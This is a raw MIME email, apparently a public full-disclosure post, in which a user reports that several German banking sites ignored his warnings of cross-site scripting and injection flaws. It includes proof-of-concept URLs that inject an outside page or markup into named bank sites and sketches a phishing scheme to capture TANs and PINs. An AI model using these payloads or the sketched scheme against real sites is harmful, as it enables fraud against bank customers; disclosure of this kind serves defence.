------=_Part_645_19031613.1135281748982 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline I emaild the Administrators 2 months ago - the only response I got was something like: "We will look into it, but we may or may not change anything on the page - who knows; we wont tell you!". I called them and the guy on the phone laughed at me. Here are the links / examples: *Original:* https://www.vr-ebanking.de/index.php?RZBK=3D0280 [vr-ebanking.de] *MY Version (CSS):* https://www.vr-ebanking.de/help;jsessionid=3DXA?Action=3DSelectMenu&SMID=3D= EigenesOrderbuch&MenuName=3D&Ini t Href=3Dhttp://www.consti.de/secure[ vr-ebanking.de] */F=E4lschung --> Imitation /* My local Banks Website: http://voba-lindenberg.de/content_suche.php?search=3DMysql_Injection?' The Institute that should secure the financial institute's websites: http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query= =3DAA%22%3EWhatever_You_Like_&SearchMax=3D10 and so on.. The vr-ebanking site is used by millions of people each day for their daily financial stuff (ebanking) - someone (phisers) could easily use the CSS (Cross Site Scripting) to create real looking websites "within" the domain; More importantly they could create a website that does all the true login stuff (in the background) but sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql database full of working tans!). This is not looking to good for my bank, but they dont listen - -- Constantin Hofstetter http://www.consti.de Constantin.Hofstetter@gmail.com mailmespam@gmail.com ------=_Part_645_19031613.1135281748982 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline I emaild the Administrators 2 months ago - the only response I got was some= thing like:
"We will look into it, but we may or may not change any= thing on the page - who knows; we wont tell you!".
I called them an= d the guy on the phone laughed at me.

Here are the links / examples:

Original:
https://www.vr-ebanking.de/index.php?RZBK=3D028= 0 [vr-ebanking.de]
MY Version (CSS):
https://www.vr-e= banking.de/help;jsessionid=3DXA?Act i on=3DSelectMenu&SMID=3DEigenesOrderbuch&MenuName=3D&Init Href= =3Dhttp://www.consti.de/secure [vr-eb= anking.de]
/F=E4lschung --> Imitation /

My local Banks Website:
http://voba-lindenberg.de/content_suche.php?search=3D<b>Mysql_Injecti= on?</b>'

The Institute = that should secure the financial institute's websites:
http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&que= ry=3DAA%22%3E<b>Whatever_You_Like_</b>&SearchMax=3D10

and so on..

The vr-ebanking site is used b= y millions of people each day for their daily financial stuff (ebanking) - = someone (phisers) could easily use the CSS (Cross Site Scripting) to create
real looking websites "within" the domain; More importantly t= hey could create a website that does all the true login stuff (in the backg= round) but sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql database full of working tans!).This is not looking to good for my bank, but they dont listen -

--=
Constantin Hofstetter
http://www.c= onsti.de
Constantin.Hofst= etter@gmail.com
mailmespam@g= mail.com ------=_Part_645_19031613.1135281748982--